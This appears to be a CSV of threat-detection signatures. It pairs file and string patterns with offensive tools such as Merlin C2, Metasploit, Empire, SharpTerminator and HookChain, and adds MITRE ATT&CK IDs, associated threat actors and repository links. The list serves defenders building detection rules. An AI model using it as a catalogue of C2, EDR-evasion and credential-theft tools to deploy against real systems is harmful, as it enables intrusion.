"*merlinHTTP.WINHTTP*",".{0,1000}merlinHTTP\.WINHTTP.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","51791"
"*merlinHTTP.WININET*",".{0,1000}merlinHTTP\.WININET.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","51792"
"*merlinServer-*.7z*",".{0,1000}merlinServer\-.{0,1000}\.7z.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","51793"
"*merlinServer-*.exe*",".{0,1000}merlinServer\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","51794"
"*merlinserver.go*",".{0,1000}merlinserver\.go.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001  -  T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","51795"
"*merlinserver.go*",".{0,1000}merlinserver\.go.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","51796"
"*merlinserver_windows_x64.exe*",".{0,1000}merlinserver_windows_x64\.exe.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001  -  T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","51797"
"*merlinserver_windows_x64.exe*",".{0,1000}merlinserver_windows_x64\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","51798"
"*merlinServer-Darwin-x64.exe*",".{0,1000}merlinServer\-Darwin\-x64\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","#linux","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","51799"
"*merlinServer-Darwin-x64.exe*",".{0,1000}merlinServer\-Darwin\-x64\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","#linux","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","51800"
"*merlinServer-Linux*",".{0,1000}merlinServer\-Linux.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","#linux","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","51801"
"*merlinServer-Linux-x64.7z*",".{0,1000}merlinServer\-Linux\-x64\.7z.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","#linux","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","51802"
"*merlinServerLog.txt*",".{0,1000}merlinServerLog\.txt.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001  -  T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","51803"
"*merlinServerLog.txt*",".{0,1000}merlinServerLog\.txt.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","51804"
"*merlinServer-Windows-x64.exe*",".{0,1000}merlinServer\-Windows\-x64\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","51805"
"*merlinServer-Windows-x64.exe*",".{0,1000}merlinServer\-Windows\-x64\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","51806"
"*mertdas/RedPersist*",".{0,1000}mertdas\/RedPersist.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","1","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","51807"
"*mertdas/SharpIncrease*",".{0,1000}mertdas\/SharpIncrease.{0,1000}","offensive_tool_keyword","SharpIncrease","binary padding to add junk data and change the on-disk representation of a file","T1480 - T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/mertdas/SharpIncrease","1","1","N/A","N/A","6","2","148","30","2024-06-28T21:36:46Z","2023-03-14T23:35:32Z","51808"
"*mertdas/SharpLDAP*",".{0,1000}mertdas\/SharpLDAP.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","N/A","8","1","0","1","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z","51809"
"*mertdas/SharpTerminator*",".{0,1000}mertdas\/SharpTerminator.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","10","4","341","66","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z","51810"
"*Message Box created from HookChain*",".{0,1000}Message\sBox\screated\sfrom\sHookChain.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","0","N/A","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","51883"
"*MessageBox.Show*Pwned*",".{0,1000}MessageBox\.Show.{0,1000}Pwned.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","51884"
"*messagebox_reflective.dll*",".{0,1000}messagebox_reflective\.dll.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","51885"
"*MessageBoxW(*""Stardust Socket Failed""*",".{0,1000}MessageBoxW\(.{0,1000}\""Stardust\sSocket\sFailed\"".{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","N/A","N/A","10","10","103","10","2025-03-27T12:47:34Z","2024-04-11T12:17:22Z","51886"
"*MessageBoxW(*""Stardust Socket Initialization""*",".{0,1000}MessageBoxW\(.{0,1000}\""Stardust\sSocket\sInitialization\"".{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","N/A","N/A","10","10","103","10","2025-03-27T12:47:34Z","2024-04-11T12:17:22Z","51887"
"*MessageBoxW(*""We are all made of Stardust!""*",".{0,1000}MessageBoxW\(.{0,1000}\""We\sare\sall\smade\sof\sStardust!\"".{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","N/A","N/A","10","10","103","10","2025-03-27T12:47:34Z","2024-04-11T12:17:22Z","51888"
"*MessageDeobfuscation.exe*",".{0,1000}MessageDeobfuscation\.exe.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","51889"
"*met_inject.py*",".{0,1000}met_inject\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","51890"
"*metagoofil*",".{0,1000}metagoofil.{0,1000}","offensive_tool_keyword","metagoofil","Metagoofil is a tool for extracting metadata of public documents (pdf.doc.xls.ppt..etc) availables in the target websites.This information could be useful because you can get valid usernames. people names. for using later in bruteforce password attacks (vpn. ftp. webapps). the tool will also extracts interesting paths of the documents. where we can get shared resources names. server names... etc.","T1213 - T1596 - T1083 - T1082","TA0007 - TA0009 - TA0004","N/A","N/A","Reconnaissance","https://github.com/laramies/metagoofi","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","51891"
"*metame -i *.exe*",".{0,1000}metame\s\-i\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","metame","metame is a metamorphic code engine for arbitrary executables","T1027 - T1059.003 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/a0rtega/metame","1","0","N/A","N/A","N/A","6","580","88","2019-10-06T18:24:14Z","2016-08-07T13:56:57Z","51892"
"*Metasploit*",".{0,1000}Metasploit.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51893"
"*metasploit.exe*",".{0,1000}metasploit\.exe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51894"
"*metasploit.go*",".{0,1000}metasploit\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","51895"
"*metasploit.rb*",".{0,1000}metasploit\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51896"
"*metasploit/framework*",".{0,1000}metasploit\/framework.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51897"
"*metasploit/peass.rb*",".{0,1000}metasploit\/peass\.rb.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","51898"
"*metasploit_framework.rb*",".{0,1000}metasploit_framework\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51899"
"*metasploit-framework*",".{0,1000}metasploit\-framework.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51900"
"*metasploit-framework*",".{0,1000}metasploit\-framework.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://www.metasploit.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51901"
"*metasploitframework*.msi*",".{0,1000}metasploitframework.{0,1000}\.msi.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51902"
"*metasploitframework-latest.msi*",".{0,1000}metasploitframework\-latest\.msi.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","1","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","51903"
"*MetasploitPayload.ps1*",".{0,1000}MetasploitPayload\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1149","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","51904"
"*MetasploitSelfSignedCA*",".{0,1000}MetasploitSelfSignedCA.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002  -  T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","https://github.com/rapid7/metasploit-framework","1","1","#certificate","default SSL cert","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51905"
"*metatwin.ps1*",".{0,1000}metatwin\.ps1.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/threatexpress/metatwin","1","1","N/A","N/A","9","4","345","71","2024-11-19T19:45:59Z","2017-10-08T13:26:00Z","51906"
"*metatwin-master*",".{0,1000}metatwin\-master.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/threatexpress/metatwin","1","1","N/A","N/A","9","4","345","71","2024-11-19T19:45:59Z","2017-10-08T13:26:00Z","51907"
"*meterpeter.ps1*",".{0,1000}meterpeter\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","51908"
